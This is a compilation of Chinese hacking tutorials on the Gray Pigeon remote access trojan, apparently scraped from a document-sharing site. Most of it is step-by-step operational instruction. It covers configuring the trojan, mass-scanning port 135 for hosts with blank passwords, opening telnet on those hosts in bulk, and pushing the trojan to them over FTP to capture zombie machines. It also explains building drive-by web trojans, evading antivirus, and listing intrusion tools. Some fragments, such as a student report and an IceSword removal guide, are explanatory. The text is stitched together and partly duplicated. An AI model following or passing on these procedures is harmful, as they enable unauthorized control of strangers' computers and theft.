灰鸽子配置内网上线批量扫135端口抓肉鸡设置详细解释加图片说明
第一:先打开灰鸽子(如图1)
初始界面。现在开始配置服务端(如图2)
其他几项不重要按个人要求来选,主要是填写公网IP、域名填好后生成服务端保存在指定路径!
注:本人用的是固定公网IP 所以只需要填写IP 在局域网使用灰鸽子需要做端口映射!介绍一个映射工具=================比特精灵端口映射工具UPnP局域网专用(如图3)===============
打开工具以后点下一步它会自动查找UPNP设备(去掉忽略ICF防火墙前面的勾~)查找出设备后(如图4)
下一步开始设置(如图5)
设置好后下一步提示添加映射端口成功!(如图6)
映射成功后不要关闭工具!
============================================================== 配置好服务端以后接下来测试一下鸽子是否能上线!只要运行一下(如图7)
鸽子配置好测试成功能上线了接下来批量扫135端口抓肉鸡!!
用十段S扫描器扫几段IP(如图8)
开始以后出现DOS界面扫到的IP全是开135端口的机器(如图9)
呵呵还不少呢~~扫完以后DOS界面会自动关系在文件目录下出现Result.txt一个文档我们用扫描整理器处理一下只保留干净的IP 点“修正并保存文件”处理后在目录下会出现一个host.txt 的文件!(如图10)
找到开135端口的IP 就该用NTscan 这个工具扫135的空口令了!(如图11)
就先扫到这里其实还有好多呢!!关闭NTscan以后会在目录下自动建出一个NTscan.txt的文件里面还
是未经过处理的IP需要把没用的字符去掉保留干净的IP 这里我们用记事本自带的替换功能就可以完成!不用说大家因该都会。处理后的IP 连空格都需要去掉!(如图12)
筛选出开135端口空口令的IP以后需要用一个批量开23端口的工具把这些IP的23端口全部打开!(如图13)
点开始工具会自动批量开23端口程序运行还是在DOS界面下处理开好23端口后DOS窗口自动关闭,接下来用端口过滤工具把开好的23端口再次过滤在抓肉鸡的时候更加准确!
把刚才找到的NTscan.txt文件后缀改成lst为NTscan.lst 呵呵这个工具只能后缀lst的文件所以要改一下后缀
改好后打开工具导入开始过滤!(如图14)
下一步导出过滤好的IP另存为23.txt文件!操作到这里已经一大半了全是批量处理还不是累就是耗时间
接下来是最重要的部分了就是批量传马了废话不多说继续!
我们先用Serv-U架设一个FTP 以后在传马的时候会用上(用别人的FTP空间也可以去免费空间申请一个就行本人是自己架设的空间别人的不稳定权限设置的很严格不能上传EXE文件或是下载上传带宽做了限制比较慢)架设FTP我想大家也都会我也就不介绍了!(如图15)是我简单架设的FTP
FTP架设好以后配置一下JS脚本!(如图16)
打来SecureCRT.EXE —>选项—>全局选项—>编辑默认设置—>选正编写好的JS脚本
下一步运行批量传马工具填写配置基本和批量开23端口类似!(如图18)
填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀!可怜~~看看有3只肉鸡了!(如图19)
哈哈还有一个德国小鸡~~
下一步运行批量传马工具填写配置基本和批量开23端口类似!(如图18)
填写好以后点开始工具自动运行JS脚本批处理传马呵呵现在鸽子提示已经有肉鸡让线了不过不是很多因为我的小马没有做免杀!可怜~~看看有3只肉鸡了!(如图19)
哈哈还有一个德国小鸡~~
==============此文章只供参考学习若使用给别人带来损失本人概不负责============== OK教程到此结束,请不要用于非法用途哦。
灰鸽子使用方法++网页木马生成和制作详解++图片噢!!! 2007-11-28 23:22:31| 分类:技术| 标签:|字号大中小订阅 一、工具:灰鸽子VIP 200 5破解版 服务端配置是最基础的,我大概说下重点.首先点”自动上线”,在”网易免费域名更新IP”处先申请一个免费域名,比如https://www.doczj.com/doc/d612354193.html,,再点”更新IP到域名”,如果一次更新出错就反复多试几次,一般会成功 的 图1 再点”配置服务程序’,这里有几点值得注意: 1.”自动上线”处一定要填正确了,就填我们刚才申请的域名https://www.doczj.com/doc/d612354193.html,,下面的”自动上线连 接密码”可不填,填写是为了安全. 2.关于破解:这也是最关键的地方,在运行鸽子客户端的时候我们先要运行它的破解文件,我们双击hosts.exe,自解压路径不能改变,至于为什么不能变大家想下就会明白了,然后运行http.exe,点”开始服务”(如果你本身的IIS开了的话应该先将其停止).前提步骤做好了,我们打开鸽子.如图2.在配置服务端的用户名和用户密码处随便填写即可.然后点”生成服务端”,到这服务端就生成了,每一步都是关键的,少一步, 服务端可能就不能生成.
二、制作网页木马 工具:专业版网页木马生成器[IFRAME溢出] 南域剑盟网页木马生成器 教主网页木马生成器 潜入者修改免杀版(备用) 光有服务端是不行的,必需要发给对方运行才行,那怎么让对方运行呢?直接将exe文件发给对方吗?基本上是很难成功的,我想最好是通过网页,让对方在浏览网页的时候不知不觉中马.做网页木马之前必需要有一个免费的空间让你放马.网上免费空间很多,大家去申请就是了.假设我们现在已经申请好了,空间地址为:https://www.doczj.com/doc/d612354193.html,/setup.exe.前提具备了.我们开始工作!先使用专业版网页木马生成器.如图 3. 在”木马程序路径”上填写http;//https://www.doczj.com/doc/d612354193.html,/setup.exe”,”生成的网页名1,2” 可以随便填,保持默认即可。下面一栏”对于IE5,IE5.5使用冰狐浪子超级木马”使用之前需要把setup.exe拷贝到chm目录中,在”木马程序名称”处填写setup.exe,在”生成后的chm文件名”处保持默认icyfox.chm即可,在”用于存放上面chm文件的完整地址处填写https://www.doczj.com/doc/d612354193.html,/icyfox.htm,最后单击生成。将生成的
我的空间为企业和个人用户提供免费自助建站服务,当然免费服务是有不少限制的 FreeW eb免费100M主页空间,号称无限流量、每天备份,web方式上传管理文件,无广告。 我家在线免费https://www.doczj.com/doc/d612354193.html,二级域名,支持转发、IP/别名解析、动态解析;50M免费虚拟主机空间,ftp上传管理文件,支持php,并提供10M的MySQL空间,有广告。 爱迪免费个人主页空间,可以使用他们的模版,也可以自己上传页面,总共仅有10M空间,还提供免费论坛、日记本、相册等免费服务。 久留一会免费ASP空间,1000M容量,但对上传文件限制较严,且文件仅保存1、2个月,无广告。申请有数量限制,每隔一个小时才有N个申请机会,比较麻烦。 4000Web免费4000M主页空间,每月8000M流量限制、每天500M流量限制,ftp、web方式上传管理文件,支持php、mysql,无广告。 赛腾网免费自助建站,150M存储空间,需要下载一个将近167M的软件来使用,但功能确实很强大,无广告。 FSDesigner免费自助建站,只需选择模板进行内容修改设计就能生成漂亮的网 站,直接把页面通过ftp传送到你的空间,很方便,支持中文。 9999mb为您提供10G免费主页空间,每月100G流量限制,可以绑定顶级域名,还有流量统计功能,ftp、web方式上传管理文件,支持php、mysql,有广告。 RedRival免费2M主页空间,ftp方式上传管理文件,支持php5,有广告。中国学生网为您提供50M免费主页空间,ftp方式上传管理文件,单个文件不超过3M,无广告。 YFWebSpace为您提供400M免费主页空间,无限流量,ftp、web方式上传管理文件,无广告。 IGotFree 为您提供无限容量免费主页空间,并且不限制流量,web方式上传管理文件,支持php、mysql,速度比较慢,无广告。 MyJavaS erver为您提供5M免费主页空间,ftp方式上传管理文件,支持JSP应用,主要是面向JSP编程爱好者提供空间,申请的时候要完成一道题目才行。
灰鸽子”网页木马从原理、制作到防范 如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么? 因为该网址很有可能就是一些不怀好意者精心制作的网页木马。 以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马 的攻击原理说起。 一、网页木马的攻击原理 首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。 有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞 来分别说明这两个问题。 ⒈自动下载程序 小提示:代码说明 a. 代码中“src”的属性为程序的网络地址,本例中“https://www.doczj.com/doc/d612354193.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。 b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe 改为bat或com,这样他们就可以把这些程序上传到服务器上了。 把这段代码插入到网页源代码的
原创作者unis 远程控制分类与远程协助区别 远程控制技术是黑客必学的技术之一。远程控制不同于远程协助,两者之间有很大的区别,所谓远程协助需要经过被控端的授权允许,并且被控端可以看到控制者的所有操作,使之控制操作透明性;例如我们的QQ远程协助,就需要对方的允许控制进行操作,并且对方也能够看到我们的操作动作,远程协助一般是用来进行远程的计算机操作协助。远程控制则不一样,远程控制只要在被控者电脑安装一个服务端,即可在不知情的情况下进行控制对方计算机以及对计算机其它操作,控制时不需要经过对方的许可就可以控制,而控制时操作的一些动作,对方也无法察觉到(除鼠标控制)。远程控制按控制类型可以分类为:(1)正向主动型远程控制(2)反向被动型。什么是正向主动型的呢?正向主动型是需要控制着主动去连接被控端,一般情况下,控制者必须知道需要被控制者的IP和端口,然后通过某种软件来进行控制被控者,例如微软的3389远程桌面、Radmin远程控制、VNC远程控制都需要知道对方的IP(端口)然后通过客户端软件进行连接对方。反向被动型控制又可以称为反弹性控制技术,指的是在被控端下安装服务端之后,由被控端主动来寻找你的客户端监听端口软件连接来进行控制,这个好处就是不需要知道对方的IP地址和端口,被控端会自己主动来找我们的监听地址和端口,当我们发现被控端已经找到我们的监听地址和端口,我们就可以控制对方电脑,这样省去要知道对方的IP和端口的麻烦了,特别是对方是动态IP 的时候。反向被动型远控在黑客界已经是主流了,黑客专门使用某些控制软件在控制对方,反弹型远控软件更是数不胜数,例如:花鸽子(灰鸽子)、白金、终结者、Ghost 等等。 远程控制软件的功能与远控木马的特性 我们这里主要讲解的是反弹型远控,并且也有讲解到Web型的正向型远控,正向型远控还有Radmin、3389远程桌面也可以值得大家去学习,关于Radmin远控的可以参考我之前写的《深度研究Radmin远控》。关于3389终端技术我已经写了《精通3389终端》。现在的远程控制软件(又称客户端,生成出的木马叫服务端)数不胜数,甚至很多已经是源码爆出,对于各种远程控制软件来说,其实基本都是具备以下功能: 【屏幕监控】:可以查看被控制者的屏幕,保存捕获的被控制屏幕的截图。并且看到对方的一切操作,可以自由选定图像位色查看,还 可以选择是否控制对方鼠标、键盘,若选择即可控制对方的电脑鼠标、键盘,这一控制对方是可以看到鼠标被控制。 【文件管理】:可以在后台查看被控者的各个磁盘中的文件,直接显示隐藏文件,可自由在对方的磁盘中删除文件、上传文件、下载文 件、重命名文件、远程显示打开文件、远程
灰鸽子使用教程图解 (考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看) 第一部份:网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。 Netman监控版详细安装方法: 1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。 2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program
式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。 3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。 5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。 出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码,可点击“选项”-“修改密码”。
“灰鸽子”攻击原理以及制作和清理 院别计算机科学与通信工程学院专业计算机科学与技术 班级学号4090511 姓名唐盼 指导教师曲荣欣 成绩 2012年 6 月7 日
“灰鸽子”攻击原理以及制作和清理 一.灰鸽子简介: “灰鸽子”是一种远程控制软件. 最早出现的时候是在模仿前辈“冰河”。“灰鸽子”在2001年出现的,采用Delphi编写,最早并未以成品方式发布,更多的是以技术研究的姿态,采用了源码共享的方式出现在互联网,导致”灰鸽子”迅速发展起来.并且出现了多种不同的版本. “灰鸽子”在出现的时候使用了当时讨论最多的“反弹端口”连接方式,用以躲避大多数个人网络防火墙的拦截。由于服务端都以隐藏方式启动,就奠定了其恶意后门木马的地位. 而我个人就是高中时候,在”灰鸽子”最盛行和风靡的时候,开始认识”灰鸽子”和关注网络安全这个话题.这也是我最早认识和接触到一种黑客软件.在伴随着”灰鸽子”的盛行发展的同时,自己的对网络互联网安全问题的兴趣也随着同步提高.在有关黑客攻击和防范领域过程中享受这种成就感.但是对于”灰鸽子”的了解大多都是来自于<<电脑报>>,<<电脑爱好者>>这些杂志.没有深入了学习.但是”灰鸽子”这个概念却深入脑海.一直伴随我成长到如今.如今虽然”灰鸽子”已经不再流行,但是这个在我心底有着深刻影响的软件,已然成了一个黑客软件的代名词. 二,灰鸽子基本原理: “灰鸽子”客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。 客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。
灰鸽子[VIP 专业版] 1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以 上的端口来完成! 2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读 取系统设定的代理服务器信息,无需用户设置! 3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的 上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专 用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。在使用 专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。 4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都 可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性 !同时具用牵手版的搜索符合条件主机的功能: a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人 在玩某个游戏! b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可 以找到打开了QQ的自动上线主机有哪些了! 5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、 上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性. 6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、 键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制! 7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。 8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表 显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息, 9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机 有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还 可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。 10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第 三方软件支持!支持Windows9x/ME/2000/Xp/2003。 11.软件附带有四款实用工具: a. EXE工具: 可以修改任何EXE文件图标,支持真彩色! b. 内网端口映射器: 它允许你将局域网内的服务映射到internet上,使 你在局域网内部也能使用自动上线功能! c. FTP服务器: 可以开本机FTP服务! d. Web服务器: 可以建立一个简单的Web服务器! 12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多 种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以 录制为Mpeg-1文件格式. 13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切! 功能简单介绍: 【1】对远程计算机文件管理:模枋Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用
有4-5个它说有非法字符像08 05 07 12 你们只要把中间的空格删了就能上了在网上找到个FTP ftp://ftp.crazystudy.:2129/ ftp://ftp2.crazystudy.:2129/里面有教程 微软金牌讲师讲解组策略(视频教程)免费下载 .jinghuazhan./jianzhan/84/749.html 爱国者黑鹰一日一动画08年所有(更新至4.20)免费下载 .jinghuazhan./jianzhan/85/748.html 黑客动画吧最新教程5-25 的教程 .jinghuazhan./jianzhan/85/747.html 华夏黑客联盟2008年大型VIP培训黑客技术系列教程 .jinghuazhan./jianzhan/85/745.html 微软windows2008官方教学视频 .jinghuazhan./jianzhan/85/746.html 黑客防线c语言编程黑客特训班(全) .jinghuazhan./jianzhan/85/743.html 黑客基地Delphi vip教程(25课全)免费高速下载 .jinghuazhan./jianzhan/85/744.html 电脑E书大全,各种计算机技术书籍,电子书免费下载 .jinghuazhan./jianzhan/84/734.html 〖红娘工作室〗木马VIP免杀培训区视频教程15课免费下载 .jinghuazhan./jianzhan/85/742.html 黑客基地VIP教程1-104课免费高速下载 .jinghuazhan./jianzhan/85/741.html 华夏黑客同盟vip教程入侵和个人电脑收集 .jinghuazhan./jianzhan/85/598.html 黑客山庄基础脱壳免费教程 .jinghuazhan./jianzhan/85/596.html PYG 原创破解入门教程,破解基础讲解,暴破实例<精装友情通讯录> .jinghuazhan./jianzhan/85/593.html 黑客VIP特训班教程系列,DELPHI,黑客基地C语言等教程 .jinghuazhan./jianzhan/85/592.html (黑软VIP)黑白网络收费教程全集下载,黑吧.黑鹰.网安vip教程,黑鹰入侵VI .jinghuazhan./jianzhan/85/518.html 第一课: HTML语言之页面标记 .hxhack./bbs/hxjc/200801jc/2008010101.rar 第二课: HTML语言之字体标记 .hxhack./bbs/hxjc/200801jc/2008010102.rar 第三课: HTML语言之文字布局标记 .hxhack./bbs/hxjc/200801jc/2008010103.rar
Gray pigeons -- 灰鸽子是什么呢? 灰鸽子简单的说它是远程监控软件,(黑客类),当然也可以说他是一个病毒.木马或则说是后门之类的恶意软件 灰鸽子分为2个部分:客户端和服务端,把服务端发出去,别人下载后安装.....(当然也有不需要安装的以及IE版的只要下载[浏览]就中招)而你操纵着鸽子的客户端,你可以任意的操纵别人的电脑...-当然想让别人中招也不是那么容易的现在国内主流的杀毒软件很容易就把它和谐掉了.当然有你有杀毒软件别人也可以做出无视杀毒软件的服务端(简称:免杀),免杀的话那就是杀毒软件查不到那是一个木马程序! 鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响!(其他的我也说不清楚)如果你会使的话那么它可以做很多事。NB点的黑客可以通过各种渠道得到它想要的东西,。(如QQ的刷钻刷QB等以及在网络上购买你想买的东西甚至其他更为贵重的物品,都可以通过它做到,当然要自己会用懂用) 总之灰鸽子在不同的人手里用法就不同,你可以拿它来逗你朋友,吓唬别人,整蛊别人,也可以拿它来刷QQ钻(前提是需要控制到宽带上网用户) 个人对鸽子的认识我对它的了解也不是全面的(现在我把鸽子的假设教程发出来喜欢耍的自己学着架设吧!) ------------------------------------ 架设教程 ------------------------------------- 首先下载灰鸽子-[你可以去百度搜索下载]我这里提供一个下载地址吧! 灰鸽子下载:https://www.doczj.com/doc/d612354193.html,/file/t06ef189fa(不知道这个地址能活多久如果能下载就下吧下不到就自己去百度搜)
常用黑客工具(网络入侵工具) 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011 远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! WebDAVScan v1.0 针对WEBDA V漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制
序: 灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的老大哥。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。 灰鸽子是一款反弹连接式的木马。现在上网一般是通过ADSL宽带拨号上网、modem上网、无线上网等等多种上网方式,有些是直接处于公网上的,但是也有很多都是用路由划分一个或多个vlan,通过NAT共用一个公网IP地址上网。所以这些用的IP都是内网IP。如果肉鸡中了灰鸽子的服务端,需要反弹回来连接灰鸽子客户端的8000端口。但是,拨号上网的IP不是固定不变而是动态IP,每次获得的IP都是不一样的;或者客户端的IP是一个内网IP。这个时候服务端就不知道该怎么去找到客户端并且连接客户端的8000端口了。(8000端口是灰鸽子的默认端口,这个端口是可以更改的) 要让鸽子的服务端每次都能找到客户端,反过来说就要让客户端的IP可以让服务端每次都可以找得到。不管客户端位于公网还是内网,让服务端找得到的方法其实是一样的。内网上线或者外网上线的方法有很多种:可以绑定一个DDNS 域名(动态域名),可以在路由器上做端口映射,也可以用鸽子自带的vport 工具做端口映射…… 总之方法很多,设置也很简单。如果有路由器的控制权呢可以进入路由器做鸽子的端口映射。如果没有路由器的控制权呢,只能找一个有着公网IP地址的肉鸡来做端口映射了。 因为我的上网环境是处在一个局域网,通过交换机和路由器公用一个公网IP上网,又不能获得路由器的控制权,所以我要讲的是vidc这个工具。因为用这个vidc最大的优点就是永远不会被杀毒软件查杀,这个vidc根本就不在杀毒软件的打击范围,这个不是我一个人说的,是很多黑客老前辈说的,并且我也亲身做过实验,用360杀毒、瑞星和国外杀软avast都进行过扫描,全部都是正常。 正文: 第一步: 把vidc的服务端vidcs传到公网的机子上,肉鸡或者朋友的电脑都可以。然后运行vidc服务端的命令是 vidcs.exe -端口号。比如vidcs.exe -5555.如图:
怎样使用灰鸽子 (考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看) 第一部份:网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。 Netman监控版详细安装方法: 1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。 2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program
式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。 3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。 5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。 出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码,可点击“选项”-“修改密码”。
冰刃使用教程(顽固文件杀灭工具-冰刃Icesword) p.s. 具体可参见下面的参考资料,带图,附中文版下载 这是一斩断黑手的利刃,它适用于Windows 2000/XP/2003 操作系统,其 内部功能是十分强大,用于查探系统中的幕后黑手-木马后门,并作出处理。可 能您也用过很多类似功能的软件,比如一些进程工具、端口工具,但是现在的 系统级后门功能越来越强,一般都可轻而易举地隐藏进程、端口、注册表、文 件信息,一般的工具根本无法发现这些“幕后黑手”。IceSword 使用了大量新颖 的内核技术,使得这些后门躲无所躲。使用前请详细阅读说明。第一次使用请 保存好数据,需要您自己承担可能的风险,特别是多处理器机器的朋友,谢谢. 增加使用教程,帮助更多需要帮助的人 lceSword冰刃(以下简称IceSword)是一款斩断系统黑手的绿色软件。在笔者的 使用中,IceSword表现很令笔者满意,绝对是一把强悍的瑞士军刀——小巧、 强大。 1.IceSword的“防” 打开软件,看出什么没?有经验的用户就会发现,这把冰刃可谓独特,它显示在系统任务栏或软件标题栏的都只是一串随机字串“CE318C”,而并是通常所见的软件程序名(见图1)。这就是IceSword独有的随机字串标题栏,用户每次打开这把冰刃,所出现的字串都是随机生成,随机出现,都不相同(随机五位/六位字串),这样很多通过标题栏来关闭程序的木马和 后门在它面前都无功而返了。另外,你可以试着将软件的文件名改一下,比如 改为 killvir.exe,那么显示出来的进程名就变为了killvir.exe。现在你再试着关 闭一下IceSword,是不是会弹出确认窗口?这样那些木马或后门就算通过鼠标 或键盘钩子控制窗口退出按钮,也不能结束IceSword的运行了,只能在IceSword的面前乖乖就范了。 点击在新窗口中浏览图片 图1 2.IceSword的“攻” 推荐以后用火狐上网,火狐可以保障你上网的安全,可以 放心浏览,可以屏蔽病毒和木马 火狐浏览器在线更新可防止最近最流行的木马及病毒变种.
其实问题主要是网络的结构问题的理解上面了 灰鸽子(服务端)要求你的条件是对方(控制端)的ip (你要控制的机器,其实它是被你做成了服务器了,叫做服务端)是外网的: 外网的ip是怎么样的? 要求不是192.168.x.x开头, 10.10.x.x也不行, 这两种ip是校园网等的内网常用的ip 通常你们在网吧是不可能令到灰鸽子上线的, 一般来说只有是家庭的adsl才有可能是公网的了。 (一般来说其它的可能都是不多的,例如: 一些校园网内部的服务器,他们的ip是公网的,是不同的) 你们经常看到一些内网的灰鸽子上线的教程可以说都是骗人的,虽然他们说的是可行的, 但是他们不说实现的条件. 但是事实上你们没有这样的条件的! 至于申请域名的事情是对于你自己的ip来说的。(我一会儿具体补充) 但是要明白对方(控制端)的ip也是内网的话,你是没有办法的。 比如我的ip是10.10.2.3 但是实际上我的公网ip是221.4.188.50 这个221.4.188.50是几十人到几百人在用的, 是用到nat技术的网络(至于什么是nat,我不说了啦,你们去网上查查把)。 你永远也不可能直接连接到我的,(直接?) 你要连接到我只有一种可能:(间接连接:中间通过一个外网的服务器,下面的讲解联系到灰鸽子自带的端口映射工具。方法:生成映射服务端,放到他们学校的服务器。不一定要控制他们学校的服务器。上线地址填被你控制机器的IP。) 就是你控制了我们学校的一些服务器:ip是202.192.240.0 这个网络的电脑是公网的.你就可以通过他连接到我 而且还要我告诉你我的ip是什么才行啊. 因为你永远也不知道我的内网ip是什么. 除非你控制了我们的路由器. 至于对方的ip是192.168.x.x这个也是一样的原理. 你永远不会连接到它,除非....(我上面说了拉) 至于自动上线的条件麻,就是多了一个: (其实自动上线的话,是令到你的肉鸡直接连接到你(你的ip)!!! 什么?你的ip会变化的?这时候就用到域名了。域名跟ip是一样的(你可以这样理解),只不过域名固定了。 其实用不用ftp空间都是一样的,如果你的机器ip是符合下面的条件的话,你直接可以用你的机器建立ftp, 如果不符合下面的条件的话,ftp空间是没有用的,肉鸡永远都不会找到你,还说什么连接呢。 这里顺便说一下很多教程在配置:(在配置服务端的时候) “(ip通知)dns解析域名,固定ip,网页文件”的配置
